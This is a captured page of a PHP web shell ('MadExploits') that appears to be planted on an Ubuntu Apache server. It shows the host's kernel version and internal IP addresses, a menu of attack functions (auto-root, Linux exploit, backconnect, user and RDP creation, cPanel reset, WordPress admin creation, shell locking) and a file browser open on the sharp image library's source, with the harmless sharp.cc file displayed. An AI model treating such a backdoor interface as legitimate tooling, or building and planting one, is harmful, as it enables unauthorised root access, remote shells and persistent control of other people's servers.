Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
sharp /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
binding.gyp
9.62
KB
-rw-rw-r--
common.cc
36.83
KB
-rw-rw-r--
common.h
10.41
KB
-rw-rw-r--
metadata.cc
10.75
KB
-rw-rw-r--
metadata.h
1.57
KB
-rw-rw-r--
operations.cc
15.39
KB
-rw-rw-r--
operations.h
3.3
KB
-rw-rw-r--
pipeline.cc
79.05
KB
-rw-rw-r--
pipeline.h
9.18
KB
-rw-rw-r--
sharp.cc
1.43
KB
-rw-rw-r--
stats.cc
6.5
KB
-rw-rw-r--
stats.h
1.18
KB
-rw-rw-r--
utilities.cc
8.71
KB
-rw-rw-r--
utilities.h
677
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sharp.cc
// Copyright 2013 Lovell Fuller and others. // SPDX-License-Identifier: Apache-2.0 #include <mutex> // NOLINT(build/c++11) #include <napi.h> #include <vips/vips8> #include "common.h" #include "metadata.h" #include "pipeline.h" #include "utilities.h" #include "stats.h" Napi::Object init(Napi::Env env, Napi::Object exports) { static std::once_flag sharp_vips_init_once; std::call_once(sharp_vips_init_once, []() { vips_init("sharp"); }); g_log_set_handler("VIPS", static_cast<GLogLevelFlags>(G_LOG_LEVEL_WARNING), static_cast<GLogFunc>(sharp::VipsWarningCallback), nullptr); // Methods available to JavaScript exports.Set("metadata", Napi::Function::New(env, metadata)); exports.Set("pipeline", Napi::Function::New(env, pipeline)); exports.Set("cache", Napi::Function::New(env, cache)); exports.Set("concurrency", Napi::Function::New(env, concurrency)); exports.Set("counters", Napi::Function::New(env, counters)); exports.Set("simd", Napi::Function::New(env, simd)); exports.Set("libvipsVersion", Napi::Function::New(env, libvipsVersion)); exports.Set("format", Napi::Function::New(env, format)); exports.Set("block", Napi::Function::New(env, block)); exports.Set("_maxColourDistance", Napi::Function::New(env, _maxColourDistance)); exports.Set("_isUsingJemalloc", Napi::Function::New(env, _isUsingJemalloc)); exports.Set("stats", Napi::Function::New(env, stats)); return exports; } NODE_API_MODULE(sharp, init)
Close